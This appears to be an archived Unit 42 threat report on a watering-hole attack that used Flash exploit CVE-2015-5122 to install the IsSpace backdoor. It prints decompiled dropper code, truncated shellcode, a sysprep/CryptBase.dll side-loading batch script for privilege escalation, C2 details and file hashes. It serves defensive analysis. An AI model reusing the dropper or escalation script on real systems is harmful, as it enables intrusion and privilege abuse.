{ "id": "04f70c32-20fa-45dc-b732-28df2d674580", "created_at": "2026-04-06T00:18:42.846856Z", "updated_at": "2026-04-10T03:34:17.258016Z", "deleted_at": null, "sha1_hash": "f7811253f6f2c8532c92d68e64a7646160f2da44", "title": "Watering Hole Attack on Aerospace Firm Exploits CVE-2015-5122 to Install IsSpace Backdoor", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 586337, "plain_text": "Watering Hole Attack on Aerospace Firm Exploits CVE-2015-5122\r\nto Install IsSpace Backdoor\r\nBy Bryan Lee, Josh Grunzweig\r\nPublished: 2015-07-20 · Archived: 2026-04-02 11:40:55 UTC\r\nOn July 16, 2015, the Palo Alto Networks Unit 42 threat intelligence team discovered a watering hole attack on\r\nthe website of a well-known aerospace firm. The website was compromised to launch an apparent watering-hole\r\nattack against the company's customers. It was hosting an Adobe Flash exploit targeting one of the newly\r\ndisclosed vulnerabilities from the Hacking Team data breach, CVE-2015-5122.\r\nThis attack yet again showcases the opportunistic tendencies of adversary groups and bad actors. The malware\r\ndeployed by this exploit has been seen in a number of targeted attacks and provides attackers with a foothold on\r\nthe victim’s machine and/or network.\r\nThe exploit file, movie.swf, was ZWS compressed, a tactic that has been observed to evade anti-virus programs.\r\nOnce uncompressed, a binary was found to be embedded in the Flash file. Upon further analysis, this file was\r\nfound to contain behavior consistent with a Trojan commonly called IsSpace. Based on its codebase and\r\nbehavioral patterns, it appears that IsSpace could possibly be an evolution of the NFlog backdoor, which has\r\npreviously been attributed to the adversary groups DragonOK and Moafee. Both groups are thought to be\r\noperating out of Southeast Asia, and Moafee in particular has been associated with attacks on the US defense\r\nindustrial base.\r\nExploit Details\r\nThe CVE-2015-5122 exploit found within the Flash file is nearly identical to the original proof of concept (POC)\r\ndisclosed publically from the Hacking Team data breach. An analysis by Trend Micro covers the POC in detail.\r\nUnlike the POC mentioned in the Trend Micro report, this particular exploit file was weaponized, and, instead of\r\nloading calc.exe, a much more malicious file was loaded. As seen in Figure 1, the embedded shellcode is\r\nobfuscated using the same technique of representing bytes as integers and exponential numbers. However it\r\nappears that the adversary did not modify the POC much, as the variable name ‘calc’ remains unchanged.\r\nhttps://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/\r\nPage 1 of 10\n\nFigure 1. Embedded shellcode within the malicious Flash file\r\nThese values can be converted into their byte representations using a simple Python script, truncated here for\r\nbrevity.\r\n\u003e\u003e\u003e import struct\r\n\u003e\u003e\u003e shellcode = [2.179763029E9,286956,2.425377536E9,2.2444484E9,4.29496648E9,1094795585]\r\n\u003e\u003e\u003e for s in shellcode:\r\n...     print repr(struct.pack(\"I\", s))\r\n...\r\n'U\\x8b\\xec\\x81'\r\n'\\xec`\\x04\\x00'\r\n'\\x00S\\x90\\x90'\r\n'\\x90\\x90\\xc7\\x85'\r\n'\\xd0\\xfc\\xff\\xff'\r\n'AAAA'\r\nLooking at the shellcode in further detail shows a fairly simplistic instruction set. Functions are loaded\r\ndynamically, and a file is dropped to %TEMP%\\Rdws.exe before being executed using the WinExec Windows\r\nAPI call.\r\nhttps://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/\r\nPage 2 of 10\n\nsz_file_path = GetTempPathA(256, file_path);\r\nv6 = file_path;\r\nv7 = sz_file_path;\r\n*\u0026file_path[sz_file_path] = 'swdR';\r\n*\u0026v6[v7 + 4] = 'exe.';\r\n*\u0026v6[v7 + 8] = 0;\r\nfile_handle = CreateFileA(file_path, 0x40000000, 0, 0, 2, 0, 0);\r\nif ( file_handle != -1 )\r\n{\r\n  WriteFile(file_handle, data, v41, \u0026v110, 0);\r\n  CloseHandle(file_handle);\r\n  WinExec(file_path, 0);\r\n}\r\nReturning to the Flash exploit, we discover that the dropped file is embedded within the Flash file itself as\r\nByteArray. This binary data is loaded and decompressed with ZLIB prior to being stored in a newly allocated\r\nsection of memory. The address of this binary data is then stored in the shellcode before it is executed.\r\nhttps://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/\r\nPage 3 of 10\n\nFigure 2. Exploit loading binary and running shellcode\r\nAfter successful execution, a binary with the following attributes is executed on the victim’s machine.\r\nMD5 319500B2C792AEE6CD8EF8EE87D9DC1E\r\nSHA1 723DB4F13E98364098D76B925EA197F9ECD5309B\r\nSHA256 27439ADAA07F5AD16EB8039C16ECEB4E71F6358E7FC13AC645E8878DA8C3E77E\r\nSize 59904 Bytes\r\nFile Type PE32 executable (GUI) Intel 80386, for MS Windows\r\nCompile\r\nTimestamp\r\n2014-11-14 04:35:13 UTC\r\nMalware Details\r\nAs seen by the compile timestamp, this malware sample is not extremely current. The timestamp shows a compile\r\ndate of November 14, 2014, which indicates that the infrastructure used by this particular sample has remained\r\nintact for quite some time, relatively speaking. Analysis of the malware indicates that this sample is highly likely\r\nto be the Trojan tool IsSpace, which shares similar code and behaviors as the NFlog tool.\r\nWhen comparing IsSpace to NFlog, we noticed a number of changes have been made. When initially run, the\r\nmalware attempts to write log messages to ‘C:\\ProgramData\\log[.]txt’ indicating that this variant was intended to\r\nrun on Microsoft Windows 7 or higher. However, it still maintains the capability to run on operating systems\r\nhttps://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/\r\nPage 4 of 10\n\nearlier than Microsoft Windows 7 if needed. IsSpace creates an event named ‘MdQ0784kd’ to ensure that only a\r\nsingle instance of the malware is running at any given time on an infected host.\r\nTo determine the flow of execution, IsSpace gathers various data about the infected host, such as administrative\r\nrights of the user, operating system version, and CPU architecture.\r\nIf IsSpace determines that it is running as an administrator on a Microsoft Windows 7 system on a 32-bit platform,\r\nit will attempt to execute itself accordingly, using a side-loading technique. The malware will drop a cabinet file\r\nand batch script to the following locations:\r\n%TEMP%\\FASAP.DAT\r\n%TEMP%\\FASAPI.bat\r\nThe batch script contains the following:\r\n@echo off\r\nping localhost\r\nstart wusa [%TEMP%]\\FASAP.DAT /quiet /extract:%windir%\\system32\\sysprep\\\r\nping localhost\r\nping localhost\r\nping localhost\r\nping localhost\r\nping localhost\r\nstart %windir%\\system32\\sysprep\\sysprep.exe \"[CWD]\\[Malware].EXE\"\r\n[CWD] is the directory where the malware was run from and [%TEMP%] is the full path of the %TEMP%\r\ndirectory.\r\nThe batch script will first extract the cabinet file to the sysprep directory. The extracted file is a 32-bit DLL with\r\nthe name ‘CryptBase.dll.’ The batch script continues to execute sysprep.exe after approximately 5 seconds, which\r\nwill automatically load the dropped CryptBase.dll file. This DLL will execute the provided argument in a child\r\nprocess. This newly created process has elevated privileges as it is spawned by sysprep.exe.\r\nA similar process is taken for 64-bit systems. However, instead of dropping a batch script, a 64-bit executable\r\nalong with a cabinet file containing a 64-bit version of CryptBase.dll is dropped to the following path instead:\r\n%TEMP%\\FASAPI.bin\r\n%TEMP%\\FASAP.DAT\r\nhttps://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/\r\nPage 5 of 10\n\nThis executable is then run in a new process. It is responsible for unpacking the cabinet file and spawning a new\r\ninstance of sysprep.exe.\r\nIf the malware detects that it is running on a Windows XP host, it will attempt to check for Internet connectivity\r\nby making a HTTP request to www.microsoft.com. This is similar to characteristics observed in the NFlog\r\nbackdoor, with the primary deviation being that this activity only takes place when running in a Windows XP\r\nenvironment with IsSpace.\r\nIsSpace proceeds to make HTTP requests to 172.246.109.27, which appears to be its primary command and\r\ncontrol (C2) server. The initial HTTP request is made to ‘//STTip.asp.’ Note the extra leading forward slash. This\r\nis likely an unfortunate side effect of the malware expecting a subdirectory in the URI path. As this particular\r\nsample did not supply one, the extra slash is seen. An example request made can be seen below:\r\nFigure 3. Initial IsSpace beacon being sent\r\nAfter the initial beacon, IsSpace will exfiltrate victim information by making an HTTP request to ‘//SNews.asp?\r\nHostID=xx-xx-xx-xx-xx-xx’, where the HostID contains the victim’s MAC address. The POST data sent in this\r\nrequest is encrypted using the same four-byte XOR key of ‘\\x35\\x8E\\x9D\\x7A’ that has been used by the NFlog\r\ntool.\r\nFigure 4. IsSpace disseminating victim information and accepting command\r\nThe decrypted information contains data similar to the following:\r\nhttps://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/\r\nPage 6 of 10\n\n'60-F8-1D-CC-2F-CF#%##%#172.16.95.137#%#WIN-LJLV2NKIOKP#%#Win7#%#English(US)#%#2015-07-17\r\n09:31:57#%#Active#%#303_20140401#%#IsAdmins#%#IsSpace'\r\nOnce again, the exfiltrated data is very similar to what has been used by NFlog; however with IsSpace, the\r\nvictim’s user privilege level is also included, in addition to a variable of either ‘IsSpace’ or ‘IsGoogle.’ This\r\nparticular variable is still under investigation by Unit 42. Additionally, we see what is likely a campaign code of\r\n‘303_20140401’.\r\nAfter the successful check-in and initial exfiltration, IsSpace will then accept the following commands:\r\nCommand Description Response URI\r\nCMD Executes command //STravel.asp\r\nBrowse List specified directory //SJobs.asp\r\nUploadFile Upload file //SSports.asp\r\nDownLoad Download file //SWeather.asp\r\nDelFile Delete file N/A\r\nIsSpace provides attackers with a foothold into the victim’s machine and/or network. While the malware itself\r\nprovides limited functionality, it allows attackers to perform minimal reconnaissance and deploy further malware\r\nonto the device.\r\nInfrastructure\r\nFigure 5. Infrastructure related to the command and control IP address\r\nThe IP 172.246.109.27 is hardcoded in the IsSpace sample and is likely to be the primary C2 server. Pivoting off\r\nof this primary C2 IP address using passive DNS data, we located seven domain names and two additional IP\r\naddresses that may be related to this attack. Three of the domains found used the prefix ‘ssl’ or ‘dns’ as the third\r\nlevel domain; this tactic is commonly used by malware authors as an evasion method.\r\nExamining the WHOIS data for the domains revealed additional intelligence on possible attribution. Specifically,\r\nthe WHOIS data showed the start-vedioing[.]net to be allegedly registered to an entity in Japan:\r\nhttps://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/\r\nPage 7 of 10\n\nRegistry Registrant ID:\r\nRegistrant Name: Alta Rohde\r\nRegistrant Organization:\r\nRegistrant Street: tokoy\r\nRegistrant Street: tokoy\r\nRegistrant City: tokoy\r\nRegistrant State/Province: Aomori\r\nRegistrant Postal Code: 236521\r\nRegistrant Country: Japan\r\nRegistrant Phone: +81.21244215\r\nRegistrant Phone Ext:\r\nRegistrant Fax:\r\nRegistrant Fax Ext:\r\nRegistrant Email: alta.rohde@inbox[.]com\r\nAnd the anywhere-staring[.]com was found to be allegedly registered to an entity in China:\r\nRegistry Registrant ID:\r\nRegistrant Name: lan fei\r\nRegistrant Organization:\r\nRegistrant Street: tian jing lu 244\r\nRegistrant City: bei da\r\nRegistrant State/Province: qing nao\r\nRegistrant Postal Code: 888000\r\nRegistrant Country: China\r\nRegistrant Phone: +86.13877554411\r\nRegistrant Phone Ext:\r\nRegistrant Fax:\r\nRegistrant Fax Ext:\r\nRegistrant Email: csolyc110@163[.]com\r\nThe geographic regions indicated in the WHOIS data are consistent with campaigns previously associated with\r\nNFlog, showing that the adversaries attributed to this malware were highly likely to be operating out of Southeast\r\nAsia.  IsSpace is a newer variant of the NFlog malware family, and contains many similarities in its behavior and\r\ncode base. It is highly likely that adversary groups that have historically used NFlog are now using IsSpace.\r\nConclusion\r\nAdversaries continue to exploit easily accessible vulnerabilities and readily re-use exploit code and payloads,\r\nlargely due to their efficacy. This type of behavior and activity is expected to continue for the near future due to\r\nthe multiple vulnerabilities disclosed by the Hacking Team data breach.\r\nAs with many other previously disclosed advanced attacks, relying purely on a detection-based model for security\r\nis ineffective when IOCs are either unknown or are not readily available for ingestion. Thus, it is imperative that\r\nhttps://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/\r\nPage 8 of 10\n\norganizations deploy automated, behavior-based preventative measures such as Palo Alto Networks WildFire or\r\nTraps to reduce the risk of unknown attacks.\r\nPalo Alto Networks customers using WildFire are protected from this campaign. Additionally, IPS signature 14365\r\ndetects IsSpace command and control traffic inside a network.\r\nFile Information\r\nName Rdws.exe\r\nMD5 319500B2C792AEE6CD8EF8EE87D9DC1E\r\nSHA1 723DB4F13E98364098D76B925EA197F9ECD5309B\r\nSHA256 27439ADAA07F5AD16EB8039C16ECEB4E71F6358E7FC13AC645E8878DA8C3E77E\r\nSize 59904 Bytes\r\nFile Type PE32 executable (GUI) Intel 80386, for MS Windows\r\nCompile\r\nTimestamp\r\n2014-11-14 04:35:13 UTC\r\nC2 IP Address 172.246.109.27\r\nName FASAPI.bin\r\nMD5 10DBFB65836773567B466918250D7EF4\r\nSHA1 4330F5AD25980E0EBB0165F6B49727152735EF4A\r\nSHA256 25BA7D0399DDA177A2F35F2F5804BA54A272E43C192649339E5CBF8BD4EFA0E0\r\nSize 9216 Bytes\r\nFile Type PE32+ executable (console) x86-64, for MS Windows\r\nCompile\r\nTimestamp\r\n2014-05-06 13:23:38 UTC\r\nName FASAP.DAT (64-bit)\r\nMD5 7F1779F37F257006576B2D41919441EC\r\nSHA1 4AC396084E932733BB887B51FA5A5E489D9CB0EC\r\nSHA256 53EDFF51E0E52B2D1E8526FEA144E9EA923183C2CFECE8A87DDA92B8390651AF\r\nSize 4065 Bytes\r\nFile Type Microsoft Cabinet archive data, 4065 bytes, 1 file\r\nhttps://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/\r\nPage 9 of 10\n\nName CryptBase.dll (64-bit)\r\nMD5 1F132F365E60CD43FFF75CD3CA464463\r\nSHA1 4DF97974B36ADADFDFDA44172484019AD2EDD649\r\nSHA256 BDBD4974F872A6B62528F4F03C64D6CD9CF5E9352582F5AE242DC7F843A6FE55\r\nSize 9216 Bytes\r\nFile Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows\r\nCompile\r\nTimestamp\r\n2014-04-21 13:08:07 UTC\r\nName FASAP.DAT\r\nMD5 D0D267D8CBBB7DBC59CFC68742FD0559\r\nSHA1 4586685CC724DEDFFB9C41F65B2DFFC7017F2970\r\nSHA256 05ACABAC8BCA04AC36FBD8B7DFBE21BDE720EBE82A6B642721114E7FBDA01BEA\r\nSize 3870 Bytes\r\nFile Type Microsoft Cabinet archive data, 3870 bytes, 1 file\r\nName CryptBase.dll (64-bit)\r\nMD5 BCDEC2A79EADF1DA2166BBB705A25AAE\r\nSHA1 FD2CE90293CBB7CD28B42CE8FFB2CE5D95ED3260\r\nSHA256 052AAD8133E1FFC2863581DB33D366BA4180DFCF2E01ED7ACBEA4D53C355AB59\r\nSize 7680 Bytes\r\nFile Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows\r\nCompile\r\nTimestamp\r\n2014-04-20 12:19:57 UTC\r\nSource: https://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/\r\nhttps://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/" ], "report_names": [ "watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor" ], "threat_actors": [ { "id": "d7226f71-df4a-405e-9252-f8c4108303ae", "created_at": "2022-10-25T15:50:23.325171Z", "updated_at": "2026-04-10T02:00:05.413071Z", "deleted_at": null, "main_name": "Moafee", "aliases": [ "Moafee" ], "source_name": "MITRE:Moafee", "tools": [ "PoisonIvy" ], "source_id": "MITRE", "reports": null }, { "id": "a3687241-9876-477b-aa13-a7c368ffda58", "created_at": "2022-10-25T16:07:24.496902Z", "updated_at": "2026-04-10T02:00:05.010744Z", "deleted_at": null, "main_name": "Hacking Team", "aliases": [], "source_name": "ETDA:Hacking Team", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "5ffe400c-6025-44c2-9aa1-7c34a7a192b0", "created_at": "2023-01-06T13:46:38.469688Z", "updated_at": "2026-04-10T02:00:02.987949Z", "deleted_at": null, "main_name": "DragonOK", "aliases": [ "Moafee", "BRONZE OVERBROOK", "G0017", "G0002", "Shallow Taurus" ], "source_name": "MISPGALAXY:DragonOK", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7ebda3c6-1789-4d84-97cf-47fb18a0cb28", "created_at": "2022-10-25T15:50:23.78829Z", "updated_at": "2026-04-10T02:00:05.415039Z", "deleted_at": null, "main_name": "DragonOK", "aliases": [ "DragonOK" ], "source_name": "MITRE:DragonOK", "tools": [ "PoisonIvy", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "e90c06e4-e3e0-4f46-a3b5-17b84b31da62", "created_at": "2023-01-06T13:46:39.018236Z", "updated_at": "2026-04-10T02:00:03.183123Z", "deleted_at": null, "main_name": "Hacking Team", "aliases": [], "source_name": "MISPGALAXY:Hacking Team", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c3c08eb0-cced-43ab-b126-fbe0c39a0698", "created_at": "2022-10-25T16:07:23.872885Z", "updated_at": "2026-04-10T02:00:04.767193Z", "deleted_at": null, "main_name": "Moafee", "aliases": [ "G0002" ], "source_name": "ETDA:Moafee", "tools": [ "Chymine", "Darkmoon", "Gen:Trojan.Heur.PT", "HTran", "HUC Packet Transmit Tool", "Mongall", "NFlog", "NewCT2", "Poison Ivy", "SPIVY", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null }, { "id": "593dd07d-853c-46cd-8117-e24061034bbf", "created_at": "2025-08-07T02:03:24.648074Z", "updated_at": "2026-04-10T02:00:03.625859Z", "deleted_at": null, "main_name": "BRONZE OVERBROOK", "aliases": [ "Danti ", "DragonOK ", "Samurai Panda ", "Shallow Taurus ", "Temp.DragonOK " ], "source_name": "Secureworks:BRONZE OVERBROOK", "tools": [ "Aveo", "DDKONG", "Godzilla Webshell", "HelloBridge", "IsSpace", "NFLog Trojan", "PLAINTEE", "PlugX", "Rambo" ], "source_id": "Secureworks", "reports": null }, { "id": "340d1673-0678-4e1f-8b75-30da2f65cc80", "created_at": "2022-10-25T16:07:23.552036Z", "updated_at": "2026-04-10T02:00:04.653109Z", "deleted_at": null, "main_name": "DragonOK", "aliases": [ "Bronze Overbrook", "G0017", "Shallow Taurus" ], "source_name": "ETDA:DragonOK", "tools": [ "Agent.dhwf", "CT", "Chymine", "Darkmoon", "Destroy RAT", "DestroyRAT", "FF-RAT", "FormerFirstRAT", "Gen:Trojan.Heur.PT", "HTran", "HUC Packet Transmit Tool", "HelloBridge", "IsSpace", "KHRAT", "Kaba", "Korplug", "Mongall", "NFlog", "NewCT", "NfLog RAT", "PlugX", "Poison Ivy", "Rambo", "RedDelta", "SPIVY", "Sogu", "SysGet", "TIGERPLUG", "TVT", "Thoper", "TidePool", "Xamtrav", "brebsd", "ffrat", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434722, "ts_updated_at": 1775792057, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f7811253f6f2c8532c92d68e64a7646160f2da44.pdf", "text": "https://archive.orkl.eu/f7811253f6f2c8532c92d68e64a7646160f2da44.txt", "img": "https://archive.orkl.eu/f7811253f6f2c8532c92d68e64a7646160f2da44.jpg" } }